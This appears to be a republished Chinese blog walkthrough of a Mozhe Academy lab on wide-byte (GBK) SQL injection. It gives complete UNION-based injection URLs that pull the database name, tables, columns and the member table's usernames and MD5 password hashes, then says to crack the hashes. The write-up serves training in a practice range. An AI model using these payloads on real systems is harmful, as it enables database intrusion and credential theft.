墨者学院-----SQL注入漏洞测试(宽字节)

其他 2021-11-29 13:35:59 阅读次数: 0

SQL注入漏洞测试(宽字节)

宽字节的注入原理

正常情况下，我们输入单引号会进行测试，这个时候PHP中的addslashes函数会将（单引号，双引号，斜杠\，null字符）
等进行转义。使我们无法闭合单引号。但是如果存在宽字节注入，我们输入==%df’时，单引号会被转义为反斜杠\，URL编码
是%5c==。又如果数据库使用GBK字符编码的话，两个字符会编码成一个汉字。带到数据库中查询就是%df%5c转换为汉字
運，从而使单引号逃逸出来。
在这里插入图片描述
输入常规关键字发现页面并没变化，再次输入%df’页面爆出错误

接下来老步骤，利用联合查询的那一个套路

判断字段数

http://219.153.49.228:45350/new_list.php?id=1%df' order by 5 --+

在这里插入图片描述

判断回显点

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,5 --+

3和5是回显点

利用回显点爆破数据库

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,database() --+

mozhe_discuz_stormgroup
在这里插入图片描述

爆破表，字段和字段内容

notice,stormgroup_member

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database() --+

name,password,status表名改为十六进制

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x73746f726d67726f75705f6d656d626572  --+

mozhe,mozhe

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(name) from stormgroup_member --+

3114b433dece9180717f2b7de56b28a3,
cc108ad52ecbe4ebbee499789b4aac2d

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(password) from stormgroup_member --+

MD5解密即可成功获取key

猜你喜欢

转载自blog.csdn.net/qq_43590351/article/details/113005470

墨者学院之SQL注入漏洞测试(宽字节)

墨者学院-----SQL注入漏洞测试(宽字节)

墨者学院 - SQL注入漏洞测试(POST)

墨者学院--SQL注入漏洞测试(布尔盲注)

墨者学院-----SQL注入漏洞测试(布尔盲注)

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)

墨者学院-SQL手工注入漏洞测试(MySQL数据库)

墨者学院 - SQL手工注入漏洞测试(Access数据库)

墨者学院-SQL手工注入漏洞测试(Access数据库)

墨者学院 - SQL手工注入漏洞测试(SQLite数据库)

墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)

墨者学院 - SQL手工注入漏洞测试(MongoDB数据库)

墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)

墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)

靶场练习-墨者学院-sql注入漏洞测试(布尔盲注）

墨者学院-SQL过滤字符后手工注入漏洞测试(第1题)

墨者学院--SQL手工注入漏洞测试(MySQL数据库)

SQL手工注入漏洞测试(MySQL数据库-字符型) 墨者学院

墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型）

墨者学院之SQL手工注入漏洞测试(MySQL数据库)

墨者学院----SQL过滤字符后手工注入漏洞测试(第2题)

墨者学院----SQL过滤字符后手工注入漏洞测试(第1题)

墨者学院-----SQL过滤字符后手工注入漏洞测试(第3题)

靶场练习-墨者学院-sql注入- 手工注入漏洞测试(MySQL数据库-字符型)

墨者学院 - XPath注入漏洞实战

墨者学院-XPath注入漏洞实战

【墨者学院】SQL手工注入漏洞测试(MySQL数据库) 超级详细小白也会

墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

墨者靶场----SQL注入漏洞测试(时间盲注)

墨者靶场------SQL注入漏洞测试(报错盲注)

今日推荐

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

周排行

计算机组成与设计（七）—— 除法器

Integer Approximation(分治+枚举)

大话数据库索引

windows10系统JDK的配置及下载地址

mysql实现秒值转换中原六仔平台搭建

Codeforces Round #556 (Div. 1)

百练1064 网线主管

Codeforces 995F Cowmpany Cowmpensation

子集生成之增量构造法，位向量法，二进制法

ERROR: cmd.exe failed with args /c "/APK\gradle\rungradle.bat...

每日归档

更多

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)